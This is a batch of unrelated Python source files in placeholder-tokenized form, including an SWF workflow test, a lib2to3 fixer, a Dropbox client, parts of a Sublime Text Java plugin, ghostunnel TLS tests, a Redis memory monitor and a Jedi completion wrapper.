. a ( Timeout ) <EOL> wfe . first_timeout ( ) . should . be . a ( Timeout ) <EOL> process_first_timeout ( wfe ) <EOL> task . first_timeout ( ) . should . be . none <EOL> def test_activity_task_cannot_change_state_on_closed_workflow_execution ( ) : <EOL> wfe = make_workflow_execution ( ) <EOL> wfe . start ( ) <EOL> task = ActivityTask ( <EOL> activity_id = "<STR_LIT>" , <EOL> activity_type = "<STR_LIT:foo>" , <EOL> input = "<STR_LIT>" , <EOL> scheduled_event_id = <NUM_LIT> , <EOL> timeouts = ACTIVITY_TASK_TIMEOUTS , <EOL> workflow_execution = wfe , <EOL> ) <EOL> wfe . complete ( <NUM_LIT> ) <EOL> task . timeout . when . called_with ( Timeout ( task , <NUM_LIT:0> , "<STR_LIT:foo>" ) ) . should . throw ( SWFWorkflowExecutionClosedError ) <EOL> task . complete . when . called_with ( ) . should . throw ( SWFWorkflowExecutionClosedError ) <EOL> task . fail . when . called_with ( ) . should . throw ( SWFWorkflowExecutionClosedError ) </s>
<s> from __future__ import unicode_literals <EOL> from lib2to3 . fixer_base import BaseFix <EOL> from lib2to3 . pgen2 import token <EOL> class FixTrailingWhitespace ( BaseFix ) : <EOL> '''<STR_LIT>''' <EOL> def match ( self , node ) : <EOL> if node . type == token . NEWLINE or node . prefix . count ( '<STR_LIT:\n>' ) : <EOL> return True <EOL> def transform ( self , node , results ) : <EOL> if node . prefix . count ( '<STR_LIT:#>' ) : <EOL> prefix_split = node . prefix . split ( '<STR_LIT:\n>' ) <EOL> new_prefix = '<STR_LIT:\n>' . join ( [ line . rstrip ( '<STR_LIT>' ) for line in <EOL> prefix_split [ : - <NUM_LIT:1> ] ] + [ prefix_split [ - <NUM_LIT:1> ] ] ) <EOL> else : <EOL> new_prefix = node . prefix . lstrip ( '<STR_LIT>' ) <EOL> if new_prefix [ <NUM_LIT:0> : <NUM_LIT:1> ] == '<STR_LIT:\\>' : <EOL> new_prefix = "<STR_LIT>" % new_prefix <EOL> if node . prefix != new_prefix : <EOL> node . prefix = new_prefix <EOL> node . changed ( ) </s>
<s> class MyClass : <EOL> def my_func ( self ) : <EOL> if self . xxxx : <EOL> self . xxxx ( ) <EOL> self . ping ( ) <EOL> def emptyline ( self ) : <EOL> return </s>
<s> def x ( ) : <EOL> return item , <EOL> after = <NUM_LIT:1> </s>
<s> from zester import MultipleClient , Attribute <EOL> class HNClient ( MultipleClient ) : <EOL> url = "<STR_LIT>" <EOL> title = Attribute ( selector = "<STR_LIT>" , modifier = "<STR_LIT>" ) <EOL> link = Attribute ( selector = "<STR_LIT>" , modifier = "<STR_LIT>" ) <EOL> points = Attribute ( selector = "<STR_LIT>" , <EOL> modifier = "<STR_LIT>" ) </s>
<s> import json <EOL> import socket <EOL> from . . urllib3 import * <EOL> from . dropbox_util import * <EOL> class DropboxConnection ( ) : <EOL> def request ( self , method , url , params = None , body = None , headers = None , raw_response = False ) : <EOL> try : <EOL> import ssl <EOL> pool_manager = PoolManager ( <EOL> num_pools = <NUM_LIT:4> , <EOL> maxsize = <NUM_LIT:8> , <EOL> block = False , <EOL> timeout = <NUM_LIT> , <EOL> cert_reqs = ssl . CERT_REQUIRED , <EOL> ca_certs = DropboxUtil . get_cert_file ( ) , <EOL> ssl_version = ssl . PROTOCOL_TLSv1 , <EOL> ) <EOL> except ( ImportError ) : <EOL> pool_manager = PoolManager ( <EOL> num_pools = <NUM_LIT:4> , <EOL> maxsize = <NUM_LIT:8> , <EOL> block = False , <EOL> timeout = <NUM_LIT> , <EOL> ) <EOL> params = params or { } <EOL> headers = headers or { } <EOL> headers [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if params : <EOL> if body : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> body = urllib . parse . urlencode ( params ) <EOL> headers [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> if hasattr ( body , "<STR_LIT>" ) : <EOL> body = str ( body . getvalue ( ) ) <EOL> headers [ "<STR_LIT>" ] = len ( body ) <EOL> for key , value in headers . items ( ) : <EOL> if type ( value ) == str and "<STR_LIT:\n>" in value : <EOL> raise ValueError ( "<STR_LIT>" + key + "<STR_LIT>" + value + "<STR_LIT:)>" ) <EOL> try : <EOL> response = pool_manager . urlopen ( method = method , url = url , body = body , headers = headers , preload_content = False ) <EOL> except socket . error as e : <EOL> raise SocketError ( url , e ) <EOL> except exceptions . SSLError as e : <EOL> raise SocketError ( url , "<STR_LIT>" % e ) <EOL> if response . status != <NUM_LIT:200> : <EOL> raise ErrorResponse ( response , response . read ( ) ) <EOL> return self . process_response ( response , raw_response ) <EOL> def process_response ( self , r , raw_response ) : <EOL> if raw_response : <EOL> return r <EOL> else : <EOL> resp = json . loads ( r . read ( ) . decode ( "<STR_LIT:utf-8>" ) ) <EOL> r . close ( ) <EOL> return resp <EOL> def get ( self , url , headers = None , raw_response = False ) : <EOL> return self . request ( "<STR_LIT:GET>" , url , headers = headers , raw_response = raw_response ) <EOL> def post ( self , url , params = None , headers = None , raw_response = False ) : <EOL> if params is None : <EOL> params = { } <EOL> return self . request ( "<STR_LIT:POST>" , url , params = params , headers = headers , raw_response = raw_response ) <EOL> def put ( self , url , body , headers = None , raw_response = False ) : <EOL> return self . request ( "<STR_LIT>" , url , body = body , headers = headers , raw_response = raw_response ) <EOL> class SocketError ( socket . error ) : <EOL> def __init__ ( self , host , e ) : <EOL> msg = "<STR_LIT>" % ( host , str ( e ) ) <EOL> socket . error . __init__ ( self , msg ) <EOL> class ErrorResponse ( Exception ) : <EOL> def __init__ ( self , http_resp , body ) : <EOL> self . status = http_resp . status <EOL> self . reason = http_resp . reason <EOL> self . body = body <EOL> self . headers = http_resp . getheaders ( ) <EOL> http_resp . close ( ) <EOL> try : <EOL> self . body = json . loads ( self . body . decode ( "<STR_LIT:utf-8>" ) ) <EOL> self . error_msg = self . body . get ( '<STR_LIT:error>' ) <EOL> self . user_error_msg = self . body . get ( '<STR_LIT>' ) <EOL> except ValueError : <EOL> self . error_msg = None <EOL> self . user_error_msg = None <EOL> def __str__ ( self ) : <EOL> if self . user_error_msg and self . user_error_msg != self . error_msg : <EOL> msg = "<STR_LIT>" % ( self . user_error_msg , self . error_msg ) <EOL> elif self . error_msg : <EOL> msg = repr ( self . error_msg ) <EOL> elif not self . body : <EOL> msg = repr ( self . reason ) <EOL> else : <EOL> msg = "<STR_LIT>" + "<STR_LIT>" % ( self . body , self . headers ) <EOL> return "<STR_LIT>" % ( self . status , msg ) </s>
<s> import sublime <EOL> import sublime_plugin <EOL> import os . path <EOL> from ... core import Settings , StateProperty <EOL> from ... utils import ( <EOL> ActionHistory , <EOL> Constant <EOL> ) <EOL> REPORT_TEMPLATE = '''<STR_LIT>''' <EOL> class JavatarActionHistoryCommand ( sublime_plugin . WindowCommand ) : <EOL> """<STR_LIT>""" <EOL> def get_actions ( self , selector ) : <EOL> selectors = selector . split ( "<STR_LIT:|>" ) <EOL> include = selectors . pop ( <NUM_LIT:0> ) . split ( "<STR_LIT:U+002C>" ) <EOL> exclude = selectors [ <NUM_LIT:0> ] . split ( "<STR_LIT:U+002C>" ) if selectors else [ ] <EOL> return ActionHistory ( ) . get_action ( include , exclude ) <EOL> def print_action_history ( self , selector ) : <EOL> """<STR_LIT>""" <EOL> selector = selector or "<STR_LIT>" <EOL> actions = self . get_actions ( selector ) <EOL> actionText = "<STR_LIT:\n>" . join ( <EOL> "<STR_LIT>" . format ( i , action ) <EOL> for i , action in enumerate ( actions , <NUM_LIT:1> ) <EOL> ) <EOL> report = REPORT_TEMPLATE . format_map ( { <EOL> "<STR_LIT>" : Constant . get_version ( ) , <EOL> "<STR_LIT>" : os . path . exists ( os . path . join ( <EOL> sublime . installed_packages_path ( ) , "<STR_LIT>" ) <EOL> ) , <EOL> "<STR_LIT>" : __name__ . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : sublime . version ( ) , <EOL> "<STR_LIT>" : sublime . channel ( ) , <EOL> "<STR_LIT>" : Settings ( ) . get ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" : ( os . path . exists ( <EOL> os . path . join ( sublime . packages_path ( ) , "<STR_LIT>" ) <EOL> ) or os . path . exists ( os . path . join ( <EOL> sublime . installed_packages_path ( ) , <EOL> "<STR_LIT>" <EOL> ) ) ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_project ( ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_file ( ) , <EOL> "<STR_LIT>" : StateProperty ( ) . is_java ( ) , <EOL> "<STR_LIT>" : sublime . packages_path ( ) , <EOL> "<STR_LIT>" : sublime . platform ( ) , <EOL> "<STR_LIT>" : sublime . arch ( ) , <EOL> "<STR_LIT>" : actionText , <EOL> } ) <EOL> view = self . window . new_file ( ) <EOL> view . set_name ( "<STR_LIT>" ) <EOL> view . set_scratch ( True ) <EOL> view . run_command ( "<STR_LIT>" , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : report , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } ) <EOL> view . run_command ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT>" } ) <EOL> def run ( self , selector = None ) : <EOL> """<STR_LIT>""" <EOL> if not Settings ( ) . get ( "<STR_LIT>" ) : <EOL> sublime . message_dialog ( <EOL> "<STR_LIT>" <EOL> ) <EOL> return <EOL> if selector is None : <EOL> self . window . show_input_panel ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> self . print_action_history , <EOL> None , <EOL> None <EOL> ) <EOL> return <EOL> self . print_action_history ( "<STR_LIT>" ) </s>
<s> import sublime <EOL> import os <EOL> import time <EOL> from . settings import Settings <EOL> class _StateProperty : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def instance ( cls ) : <EOL> if not hasattr ( cls , "<STR_LIT>" ) : <EOL> cls . _instance = cls ( ) <EOL> return cls . _instance <EOL> def is_project ( self , window = None ) : <EOL> """<STR_LIT>""" <EOL> window = window or sublime . active_window ( ) <EOL> if window : <EOL> return len ( window . folders ( ) ) > <NUM_LIT:0> <EOL> return False <EOL> def is_file ( self , view = None ) : <EOL> """<STR_LIT>""" <EOL> return self . get_file ( view ) is not None <EOL> def is_java ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> if not file_path and not view : <EOL> view = sublime . active_window ( ) . active_view ( ) <EOL> if view . file_name ( ) : <EOL> return ( <EOL> self . is_file ( view ) and <EOL> self . is_java ( file_path = view . file_name ( ) ) <EOL> ) <EOL> elif file_path : <EOL> _ , ext = os . path . splitext ( os . path . basename ( file_path ) ) <EOL> return ext in Settings ( ) . get ( "<STR_LIT>" ) <EOL> return ( <EOL> view and <EOL> view . find_by_selector ( Settings ( ) . get ( "<STR_LIT>" ) ) <EOL> ) <EOL> def is_source_folder ( self , path , can_empty = True ) : <EOL> """<STR_LIT>""" <EOL> empty = True <EOL> for name in os . listdir ( path ) : <EOL> empty = False <EOL> path_name = os . path . join ( path , name ) <EOL> if can_empty : <EOL> if os . path . isdir ( path_name ) : <EOL> if self . is_source_folder ( path_name , can_empty ) : <EOL> return True <EOL> if os . path . isfile ( path_name ) and self . is_java ( path_name ) : <EOL> return True <EOL> return can_empty and empty <EOL> def load_cache ( self ) : <EOL> from . macro import Macro <EOL> from . . utils import Utils <EOL> cache_location = Macro ( ) . parse ( Settings ( ) . get ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> cache_path = os . path . join ( cache_location , "<STR_LIT>" ) <EOL> if os . path . exists ( cache_path ) : <EOL> cache_file = open ( cache_path , "<STR_LIT:r>" ) <EOL> cache = sublime . decode_value ( cache_file . read ( ) ) <EOL> cache_file . close ( ) <EOL> if "<STR_LIT>" in cache : <EOL> valid_time = time . time ( ) - Utils . time_from_string ( <EOL> Settings ( ) . get ( "<STR_LIT>" ) <EOL> ) <EOL> if cache [ "<STR_LIT>" ] < valid_time : <EOL> return { } <EOL> return cache <EOL> else : <EOL> return { } <EOL> def save_cache ( self , cache ) : <EOL> if "<STR_LIT>" not in cache : <EOL> cache [ "<STR_LIT>" ] = int ( time . time ( ) ) <EOL> from . macro import Macro <EOL> cache_location = Macro ( ) . parse ( Settings ( ) . get ( <EOL> "<STR_LIT>" <EOL> ) ) <EOL> cache_path = os . path . join ( cache_location , "<STR_LIT>" ) <EOL> if os . path . exists ( cache_path ) : <EOL> os . remove ( cache_path ) <EOL> cache_file = open ( cache_path , "<STR_LIT:w>" ) <EOL> cache_file . write ( sublime . encode_value ( cache , True ) ) <EOL> cache_file . close ( ) <EOL> def get_file ( self , view = None ) : <EOL> """<STR_LIT>""" <EOL> view = view or sublime . active_window ( ) . active_view ( ) <EOL> if view : <EOL> return view . file_name ( ) <EOL> return None <EOL> def get_project_dirs ( self , window = None , file_path = None ) : <EOL> """<STR_LIT>""" <EOL> window = window or sublime . active_window ( ) <EOL> if window : <EOL> return window . folders ( ) <EOL> return [ self . get_dir ( file_path = file_path ) ] <EOL> def get_source_folders ( self , file_path = None , as_tuple = False , <EOL> include_missing = False ) : <EOL> """<STR_LIT>""" <EOL> source_folders = [ <EOL> source_folder <EOL> for source_folder in Settings ( ) . get ( "<STR_LIT>" , [ ] ) <EOL> if os . path . exists ( source_folder ) or include_missing <EOL> ] <EOL> if as_tuple : <EOL> if source_folders : <EOL> return ( source_folders , True ) <EOL> else : <EOL> return ( self . get_project_dirs ( file_path = file_path ) , False ) <EOL> else : <EOL> return ( <EOL> source_folders or <EOL> self . get_project_dirs ( file_path = file_path ) <EOL> ) <EOL> def get_source_folder ( self , file_path = None ) : <EOL> """<STR_LIT>""" <EOL> file_path = file_path or self . get_file ( ) <EOL> from . . utils import Utils <EOL> if self . is_project ( ) : <EOL> source_folders = self . get_source_folders ( file_path = file_path ) <EOL> if source_folders : <EOL> if not file_path : <EOL> return source_folders [ <NUM_LIT:0> ] <EOL> for source_folder in source_folders : <EOL> if Utils . contains_file ( source_folder , file_path ) : <EOL> return source_folder <EOL> if self . get_dir ( file_path = file_path ) : <EOL> return self . get_dir ( file_path = file_path ) <EOL> return None <EOL> def get_root_dir ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> if self . is_project ( ) : <EOL> project_folders = self . get_project_dirs ( file_path = file_path ) <EOL> if project_folders : <EOL> return project_folders [ <NUM_LIT:0> ] <EOL> if self . get_dir ( ) : <EOL> return self . get_dir ( file_path = file_path , view = view ) <EOL> return None <EOL> def get_dir ( self , file_path = None , view = None ) : <EOL> """<STR_LIT>""" <EOL> file_path = file_path or self . get_file ( view ) <EOL> if file_path : <EOL> return os . path . dirname ( file_path ) <EOL> return None <EOL> def get_library_paths ( self , from_global = False , include_missing = False ) : <EOL> """<STR_LIT>""" <EOL> out_library_paths = [ ] <EOL> library_paths = Settings ( ) . get ( <EOL> "<STR_LIT>" , from_global = from_global <EOL> ) <EOL> if library_paths is not None : <EOL> out_library_paths . extend ( <EOL> [ library_path , from_global ] <EOL> for library_path in library_paths <EOL> if os . path . exists ( library_path ) or include_missing <EOL> ) <EOL> if not from_global : <EOL> out_library_paths . extend ( <EOL> [ library_path , True ] <EOL> for library_path in Settings ( ) . get ( <EOL> "<STR_LIT>" , default = [ ] , from_global = True <EOL> ) <EOL> if os . path . exists ( library_path ) or include_missing <EOL> ) <EOL> return out_library_paths <EOL> def refresh_library_paths ( self , from_global = None ) : <EOL> if from_global is None : <EOL> self . refresh_library_paths ( True ) <EOL> self . refresh_library_paths ( False ) <EOL> return <EOL> previous_menu = "<STR_LIT>" if from_global else "<STR_LIT>" <EOL> library_paths_menu = { <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ <EOL> [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:name>" : previous_menu <EOL> } , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : from_global <EOL> } <EOL> } <EOL> ] <EOL> } <EOL> library_paths = self . get_library_paths ( from_global , True ) <EOL> for library_path in library_paths : <EOL> name = os . path . basename ( library_path [ <NUM_LIT:0> ] ) <EOL> if library_path [ <NUM_LIT:1> ] : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : library_path [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : True <EOL> } <EOL> } <EOL> ) <EOL> if not os . path . exists ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> elif os . path . isdir ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT:[>" + name + "<STR_LIT:]>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : library_path [ <NUM_LIT:0> ] , <EOL> "<STR_LIT>" : False <EOL> } <EOL> } <EOL> ) <EOL> if not os . path . exists ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> elif os . path . isdir ( library_path [ <NUM_LIT:0> ] ) : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> "<STR_LIT:[>" + name + "<STR_LIT:]>" , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> else : <EOL> library_paths_menu [ "<STR_LIT>" ] . append ( [ <EOL> name , <EOL> "<STR_LIT>" <EOL> ] ) <EOL> menu_name = "<STR_LIT>" <EOL> if from_global : <EOL> menu_name = "<STR_LIT>" + menu_name <EOL> else : <EOL> menu_name = "<STR_LIT>" + menu_name <EOL> sublime . active_window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : menu_name , <EOL> "<STR_LIT>" : library_paths_menu <EOL> } } ) <EOL> def refresh_source_folders ( self ) : <EOL> """<STR_LIT>""" <EOL> source_folder_menu = { <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ <EOL> [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] , [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> ] , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> ] <EOL> } <EOL> source_folders , from_settings = self . get_source_folders ( <EOL> as_tuple = True , include_missing = True <EOL> ) <EOL> for source_folder in source_folders : <EOL> name = os . path . basename ( source_folder ) <EOL> source_folder_menu [ "<STR_LIT>" ] . append ( { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:args>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : source_folder <EOL> } <EOL> } ) <EOL> source_folder_menu [ "<STR_LIT>" ] . append ( [ <EOL> ( <EOL> "<STR_LIT>" if not os . path . exists ( source_folder ) else "<STR_LIT>" <EOL> ) + name , <EOL> ( <EOL> "<STR_LIT>" <EOL> if from_settings <EOL> else "<STR_LIT>" + <EOL> "<STR_LIT>" <EOL> ) <EOL> ] ) <EOL> sublime . active_window ( ) . run_command ( "<STR_LIT>" , { "<STR_LIT>" : { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : source_folder_menu <EOL> } } ) <EOL> def StateProperty ( ) : <EOL> return _StateProperty . instance ( ) </s>
<s> import os . path <EOL> import hashlib <EOL> import urllib <EOL> class Downloader : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def request ( url , params = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> params = params or { } <EOL> if params : <EOL> url += "<STR_LIT:?>" + urllib . parse . urlencode ( params ) <EOL> return Downloader . download ( url , on_complete = on_complete ) <EOL> @ staticmethod <EOL> def download ( url , checksum = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if on_complete : <EOL> from . . threads import BackgroundThread <EOL> return BackgroundThread ( <EOL> func = Downloader . download , <EOL> args = [ url , checksum , None ] , <EOL> on_complete = on_complete <EOL> ) <EOL> else : <EOL> urllib . request . install_opener ( <EOL> urllib . request . build_opener ( urllib . request . ProxyHandler ( ) ) <EOL> ) <EOL> data = urllib . request . urlopen ( url ) . read ( ) <EOL> if checksum and hashlib . sha256 ( data ) . hexdigest ( ) != checksum : <EOL> return None <EOL> return data <EOL> except Exception as e : <EOL> raise e <EOL> @ staticmethod <EOL> def download_file ( url , path = None , checksum = None , on_complete = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if on_complete : <EOL> from . . threads import BackgroundThread <EOL> return BackgroundThread ( <EOL> func = Downloader . download_file , <EOL> args = [ url , path , checksum , None ] , <EOL> on_complete = on_complete <EOL> ) <EOL> else : <EOL> data = Downloader . download ( url ) <EOL> if checksum and hashlib . sha256 ( data ) . hexdigest ( ) != checksum : <EOL> return None <EOL> path = path or os . path . basename ( url ) <EOL> f = open ( path , "<STR_LIT:wb>" ) <EOL> f . write ( data ) <EOL> f . close ( ) <EOL> return os . path . exists ( path ) <EOL> except Exception as e : <EOL> raise e </s>
<s> from subprocess import Popen <EOL> from multiprocessing import Process <EOL> from test_common import * <EOL> import socket , ssl , time , random <EOL> def send_data ( i , p ) : <EOL> counter = <NUM_LIT:0> <EOL> while counter < <NUM_LIT:100> : <EOL> r = random . random ( ) <EOL> if r < <NUM_LIT> : <EOL> time . sleep ( r ) <EOL> continue <EOL> counter += <NUM_LIT:1> <EOL> if r < <NUM_LIT> : <EOL> p . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" . format ( i , counter ) ) <EOL> else : <EOL> p . validate_can_send_from_server ( "<STR_LIT>" , "<STR_LIT>" . format ( i , counter ) ) <EOL> r = random . random ( ) <EOL> if r < <NUM_LIT:0.5> : <EOL> p . validate_closing_client_closes_server ( "<STR_LIT>" . format ( i ) ) <EOL> else : <EOL> p . validate_closing_server_closes_client ( "<STR_LIT>" . format ( i ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ghostunnel = None <EOL> n_clients = <NUM_LIT:10> <EOL> try : <EOL> root = RootCert ( '<STR_LIT:root>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:1> , n_clients ) : <EOL> root . create_signed_cert ( "<STR_LIT>" . format ( i ) ) <EOL> ghostunnel = run_ghostunnel ( [ '<STR_LIT>' , '<STR_LIT>' . format ( LOCALHOST ) , <EOL> '<STR_LIT>' . format ( LOCALHOST ) , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( LOCALHOST , STATUS_PORT ) , <EOL> '<STR_LIT>' ] ) <EOL> proc = [ ] <EOL> for i in range ( <NUM_LIT:1> , n_clients ) : <EOL> pair = SocketPair ( TcpClient ( <NUM_LIT> ) , TlsServer ( "<STR_LIT>" . format ( i ) , '<STR_LIT:root>' , <NUM_LIT> ) ) <EOL> p = Process ( target = send_data , args = ( i , pair , ) ) <EOL> p . start ( ) <EOL> proc . append ( p ) <EOL> for p in proc : <EOL> p . join ( ) <EOL> print_ok ( "<STR_LIT:OK>" ) <EOL> finally : <EOL> terminate ( ghostunnel ) </s>
<s> from subprocess import Popen <EOL> from test_common import * <EOL> import socket , ssl , time , os , signal <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> ghostunnel = None <EOL> try : <EOL> root = RootCert ( '<STR_LIT:root>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> root . create_signed_cert ( '<STR_LIT>' ) <EOL> ghostunnel = run_ghostunnel ( [ '<STR_LIT>' , '<STR_LIT>' . format ( LOCALHOST ) , <EOL> '<STR_LIT>' . format ( LOCALHOST ) , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( LOCALHOST , STATUS_PORT ) ] ) <EOL> pair1 = SocketPair ( TlsClient ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , TcpServer ( <NUM_LIT> ) ) <EOL> pair1 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair1 . validate_tunnel_ou ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> os . rename ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ghostunnel . send_signal ( signal . SIGUSR1 ) <EOL> TlsClient ( None , '<STR_LIT:root>' , STATUS_PORT ) . connect ( <NUM_LIT:20> , '<STR_LIT>' ) <EOL> print_ok ( "<STR_LIT>" ) <EOL> pair2 = SocketPair ( TlsClient ( '<STR_LIT>' , '<STR_LIT:root>' , <NUM_LIT> ) , TcpServer ( <NUM_LIT> ) ) <EOL> pair2 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair2 . validate_tunnel_ou ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair2 . cleanup ( ) <EOL> pair1 . validate_can_send_from_client ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> pair1 . cleanup ( ) <EOL> print_ok ( "<STR_LIT:OK>" ) <EOL> finally : <EOL> terminate ( ghostunnel ) </s>
<s> import redis <EOL> import time <EOL> def main ( ) : <EOL> r = redis . StrictRedis ( ) <EOL> curr_memory = prev_memory = r . info ( ) [ '<STR_LIT>' ] <EOL> while True : <EOL> if prev_memory != curr_memory : <EOL> print ( '<STR_LIT>' % ( ( curr_memory - prev_memory ) , curr_memory ) ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> prev_memory = curr_memory <EOL> curr_memory = r . info ( ) [ '<STR_LIT>' ] <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import sys <EOL> import json <EOL> import logging <EOL> from optparse import OptionParser <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> import jedi <EOL> from jedi . api import NotFoundError <EOL> sys . path . pop ( <NUM_LIT:0> ) <EOL> is_funcargs_complete_enabled = True <EOL> auto_complete_function_params = '<STR_LIT>' <EOL> class JsonFormatter ( logging . Formatter ) : <EOL> def format ( self , record ) : <EOL> output = logging . Formatter . format ( self , record ) <EOL> data = { <EOL> '<STR_LIT>' : record . levelname . lower ( ) , <EOL> '<STR_LIT:content>' : output <EOL> } <EOL> record = json . dumps ( data ) <EOL> return record <EOL> def getLogger ( ) : <EOL> """<STR_LIT>""" <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> log . setLevel ( logging . DEBUG ) <EOL> formatter = JsonFormatter ( '<STR_LIT>' ) <EOL> hdlr = logging . StreamHandler ( sys . stderr ) <EOL> hdlr . setFormatter ( formatter ) <EOL> log . addHandler ( hdlr ) <EOL> return log <EOL> logger = getLogger ( ) <EOL> def write ( data ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( data , str ) : <EOL> data = json . dumps ( data ) <EOL> sys . stdout . write ( data ) <EOL> if not data . endswith ( '<STR_LIT:\n>' ) : <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> try : <EOL> sys . stdout . flush ( ) <EOL> except IOError : <EOL> sys . exit ( ) <EOL> def format_completion ( complete ) : <EOL> """<STR_LIT>""" <EOL> display , insert = complete . name + '<STR_LIT:\t>' + complete . type , complete . name <EOL> return display , insert <EOL> def get_function_parameters ( callDef ) : <EOL> """<STR_LIT>""" <EOL> if not callDef : <EOL> return [ ] <EOL> params = [ ] <EOL> for param in callDef . params : <EOL> if not param . name : <EOL> continue <EOL> cleaned_param = param . description . rstrip ( '<STR_LIT:U+002C>' ) <EOL> if '<STR_LIT:*>' in cleaned_param or cleaned_param in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> continue <EOL> params . append ( [ s . strip ( ) for s in cleaned_param . split ( '<STR_LIT:=>' ) ] ) <EOL> return params <EOL> class JediFacade : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , source , line , offset , filename = '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' ) : <EOL> filename = filename or None <EOL> self . script = jedi . Script ( <EOL> source , int ( line ) , int ( offset ) , filename , encoding <EOL> ) <EOL> def get ( self , action ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return getattr ( self , '<STR_LIT>' + action ) ( ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' . format ( action ) ) <EOL> def get_goto ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _goto ( ) <EOL> def get_usages ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _usages ( ) <EOL> def get_funcargs ( self ) : <EOL> """<STR_LIT>""" 